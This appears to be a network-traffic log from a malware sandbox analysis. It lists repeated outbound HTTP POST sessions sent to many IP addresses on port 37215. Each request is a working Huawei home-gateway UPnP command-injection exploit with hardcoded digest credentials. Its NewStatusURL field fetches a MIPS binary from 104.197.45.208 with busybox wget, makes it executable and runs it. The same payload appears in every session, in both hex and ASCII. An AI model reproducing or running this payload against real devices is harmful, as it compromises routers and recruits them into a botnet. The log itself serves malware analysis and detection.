                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 39 37 2e 34 35 2e 32 30 38 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 [TRUNCATED]
                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 104.197.45.208 -l /tmp/kh -r /mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            88192.168.2.1456970156.17.229.8437215
                                            TimestampBytes transferredDirectionData
                                            Jun 14, 2024 10:43:34.662915945 CEST818OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                            Content-Length: 430
                                            Connection: keep-alive
                                            Accept: */*
                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 39 37 2e 34 35 2e 32 30 38 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 [TRUNCATED]
                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 104.197.45.208 -l /tmp/kh -r /mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            89192.168.2.1454224156.83.228.5537215
                                            TimestampBytes transferredDirectionData
                                            Jun 14, 2024 10:43:34.662966967 CEST818OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                            Content-Length: 430
                                            Connection: keep-alive
                                            Accept: */*
                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 39 37 2e 34 35 2e 32 30 38 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 [TRUNCATED]
                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 104.197.45.208 -l /tmp/kh -r /mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            90192.168.2.1442584156.45.119.8037215
                                            TimestampBytes transferredDirectionData
                                            Jun 14, 2024 10:43:34.662966967 CEST818OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                            Content-Length: 430
                                            Connection: keep-alive
                                            Accept: */*
                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 39 37 2e 34 35 2e 32 30 38 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 [TRUNCATED]
                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 104.197.45.208 -l /tmp/kh -r /mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            91192.168.2.1448158156.99.70.13037215
                                            TimestampBytes transferredDirectionData
                                            Jun 14, 2024 10:43:34.663013935 CEST818OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                            Content-Length: 430
                                            Connection: keep-alive
                                            Accept: */*
                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 39 37 2e 34 35 2e 32 30 38 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 [TRUNCATED]
                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 104.197.45.208 -l /tmp/kh -r /mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            92192.168.2.1454992197.147.108.14437215
                                            TimestampBytes transferredDirectionData
                                            Jun 14, 2024 10:43:34.663017988 CEST818OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                            Content-Length: 430
                                            Connection: keep-alive
                                            Accept: */*
                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 39 37 2e 34 35 2e 32 30 38 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 [TRUNCATED]
                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 104.197.45.208 -l /tmp/kh -r /mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            93192.168.2.145860841.135.86.17037215
                                            TimestampBytes transferredDirectionData
                                            Jun 14, 2024 10:43:34.663033009 CEST818OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                            Content-Length: 430
                                            Connection: keep-alive
                                            Accept: */*
                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 39 37 2e 34 35 2e 32 30 38 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 [TRUNCATED]
                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 104.197.45.208 -l /tmp/kh -r /mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            94192.168.2.144260441.219.214.8937215
                                            TimestampBytes transferredDirectionData
                                            Jun 14, 2024 10:43:34.663033962 CEST818OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                            Content-Length: 430
                                            Connection: keep-alive
                                            Accept: */*
                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 39 37 2e 34 35 2e 32 30 38 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 [TRUNCATED]
                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 104.197.45.208 -l /tmp/kh -r /mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            95192.168.2.1442436197.42.188.7737215
                                            TimestampBytes transferredDirectionData
                                            Jun 14, 2024 10:43:34.663064003 CEST818OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                            Content-Length: 430
                                            Connection: keep-alive
                                            Accept: */*
                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 39 37 2e 34 35 2e 32 30 38 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 [TRUNCATED]
                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 104.197.45.208 -l /tmp/kh -r /mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            96192.168.2.144783241.14.203.25137215
                                            TimestampBytes transferredDirectionData
                                            Jun 14, 2024 10:43:34.663091898 CEST818OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                            Content-Length: 430
                                            Connection: keep-alive
                                            Accept: */*
                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 39 37 2e 34 35 2e 32 30 38 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 [TRUNCATED]
                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 104.197.45.208 -l /tmp/kh -r /mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            97192.168.2.145327441.32.235.16637215
                                            TimestampBytes transferredDirectionData
                                            Jun 14, 2024 10:43:34.663151026 CEST818OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                            Content-Length: 430
                                            Connection: keep-alive
                                            Accept: */*
                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 39 37 2e 34 35 2e 32 30 38 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 [TRUNCATED]
